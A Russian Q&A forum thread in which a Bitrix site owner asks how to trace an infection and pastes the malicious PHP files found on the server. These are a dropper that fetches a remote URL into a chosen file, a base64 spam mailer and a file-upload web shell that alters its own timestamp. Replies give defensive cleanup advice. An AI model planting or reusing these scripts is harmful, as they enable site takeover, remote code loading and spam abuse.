@ermolaev_nikita

Как отследить вирус на сайте?

Имеется сайт на Bitrix установленный на VDS'ку на днях обнаружил странный код в index.php, код представляет собой зашифрованный php и вмести с ним появляются различные файлы типа
hh.ru
mama332.php
wp-cron-sample.php
и т.д. содержимое файлов следующее

<?php
function class_x_i($x = ''){
$urlset = isset($_GET['name']) ? trim($_GET['name']) : '';
$filename = isset($_GET['file']) ? trim($_GET['file']) : '';
$ch = curl_init('http://'.$urlset);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
file_put_contents($filename,$result);
echo 'O1024K';
}
class_x_i();
?>


<?php
if(isset($_POST["mailto"]))
        $MailTo = base64_decode($_POST["mailto"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgheader"]))
        $MessageHeader = base64_decode($_POST["msgheader"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgbody"]))
        $MessageBody = base64_decode($_POST["msgbody"]);
else
	{
	echo "indata_error";
	exit;
	}
if(isset($_POST["msgsubject"]))
        $MessageSubject = base64_decode($_POST["msgsubject"]);
else
	{
	echo "indata_error";
	exit;
	}
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
	echo "sent_ok";
else
	echo "sent_error";
?>


Как можно отследить источник, который инициирует создание этих файлов?

1. Можно логировать все запросы на сайт и при повторном обнаружении данных файлов, отследить возможную связь с некими запросами. Т.к. вирус может авторизоваться на сайте используя некий скрипт.

2. Проверил крон, ничего креминального не нашел, просто запуск cron_events.php в нем тоже все стандартно.

3. В агентах Битрикса тоже ничего не нашел, в момент появление этих файлов не выполнялся ни один агент
  • Вопрос задан
  • 557 просмотров
Пригласить эксперта
Ответы на вопрос 3
SilenceOfWinter
@SilenceOfWinter
та еще зажигалка...
пароли поменять, софт обновить, админку перенести, онлайн проверка есть у каспера и веба
Ответ написан
alexyarik
@alexyarik
Битрикс разработчик
Вам не источник искать сейчас нужно, а сделать профилактику:
1) Подключить на хостинге к услуге VDS антивирус, настроить ежедневную проверку, проверить файлы аккаунта.
2) Сменить все доступы: сайт, база, фтп (ssh), панель хостинга
3) Восстановить сайт из бекапа датой до взлома
4) Если нет бекапа тогда поставить модуль с маркетплейса "Поиск троянов" и прогнать сайт, если есть зараженные системные файлы перезалить ядро и модули битрикс
Ответ написан
Комментировать
@ermolaev_nikita Автор вопроса
по логам отследил некий файл license.php через который загружались файлы

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
<title>utf</title>
</head>
<body>
<?php
print "<h1>#p@$c@#</h1>\n";
echo "Your IP: ";
echo $_SERVER['REMOTE_ADDR'];
echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
echo "<input type=\"file\" name=\"filename\"><br> \n";
echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
echo "</form>\n";
if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
	{
	move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
	$file = $_FILES/*;*/["filename"]["name"];
	echo "<a href=\"$file\">$file</a>";
	} else {
	echo("empty");
	}
$filename = $_SERVER[SCRIPT_FILENAME];
touch/*;*/($filename, $time);
?>
</body>
</html>


Однако дата создания у него не известна, соответственно нельзя точно понять, когда произошло заражение и через что =((

с помощью решения "Поиск троянов" из маркет плейса нашел ещё кучу файлов зашифрованным php кодом, заменил все пароли, будемс ждать
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы